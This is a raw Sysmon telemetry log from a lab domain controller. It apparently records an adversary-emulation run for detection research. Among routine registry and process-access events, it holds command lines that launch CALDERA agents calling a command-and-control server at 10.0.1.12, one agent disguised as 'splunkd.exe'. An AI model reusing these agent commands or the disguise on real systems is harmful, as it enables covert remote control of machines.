13:34:08.236{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:08.158{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\GuidBinary Data 12241200x80000000000000001161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-DeleteValue2021-01-18 13:34:08.158{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\Guid 10341000x80000000000000001160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.142{59A5CD1D-8E44-6005-0A00-00000000A301}8481136C:\Windows\system32\services.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.142{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.142{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.148{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k smbsvcsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.142{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.142{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.142{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.142{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:08.142{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 10341000x80000000000000001151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:07.174{59A5CD1D-8E46-6005-1100-00000000A301}11721400C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:07.158{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:05.799{59A5CD1D-8E47-6005-1C00-00000000A301}21642280C:\Windows\system32\conhost.exe{59A5CD1D-8E4D-6005-2500-00000000A301}2988C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:05.799{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E4D-6005-2500-00000000A301}2988C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:05.799{59A5CD1D-8E47-6005-1900-00000000A301}21362792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E4D-6005-2500-00000000A301}2988C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+8470331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+846554db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83b64a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83bc2edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83b98356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba4425(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+846554db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83b8acd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83b8a2a7(wow64) 154100x80000000000000001146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:05.750{59A5CD1D-8E4D-6005-2500-00000000A301}2988C:\Users\Public\sandcat.exe-----"C:\Users\Public\sandcat.exe" -server http://10.0.1.12:8888 -group my_group -vC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=4AAC4143487A1888FC416C8D6AAA28BF,SHA256=A98ED4833C64FF96AD74F1A76358B1FB947C7BC61502E51624AFE6944982EC93,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_agent.ps1 13241300x80000000000000001145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000000) 13241300x80000000000000001144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000001143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000001142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000000) 13241300x80000000000000001141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000001140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000001139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000001138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000001137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000001136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000001135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000001134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-495 10341000x80000000000000001133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.971{59A5CD1D-8E4A-6005-2400-00000000A301}29242944C:\Windows\system32\conhost.exe{59A5CD1D-8E4A-6005-2300-00000000A301}2916C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.955{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E4A-6005-2400-00000000A301}2924C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.955{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E4A-6005-2300-00000000A301}2916C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.955{59A5CD1D-8E46-6005-1800-00000000A301}20842796Shell.Commands.ManagWindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E4A-6005-2300-00000000A301}2916C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+8d00c|C:\Windows\System32\shell32.dll+114fd7|C:\Windows\System32\shell32.dll+114f35|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+33903a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+276811|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+acd828|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+271e5f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b56bc|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64) 154100x80000000000000001129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.911{59A5CD1D-8E4A-6005-2300-00000000A301}2916C:\Users\Public\splunkd.exe-----"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_manx_agent.ps1 13241300x80000000000000001128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:02.768{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000379) 11241100x80000000000000001127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:34:02.752{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\splunkd.exe2021-01-18 13:32:53.415 10341000x80000000000000001126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 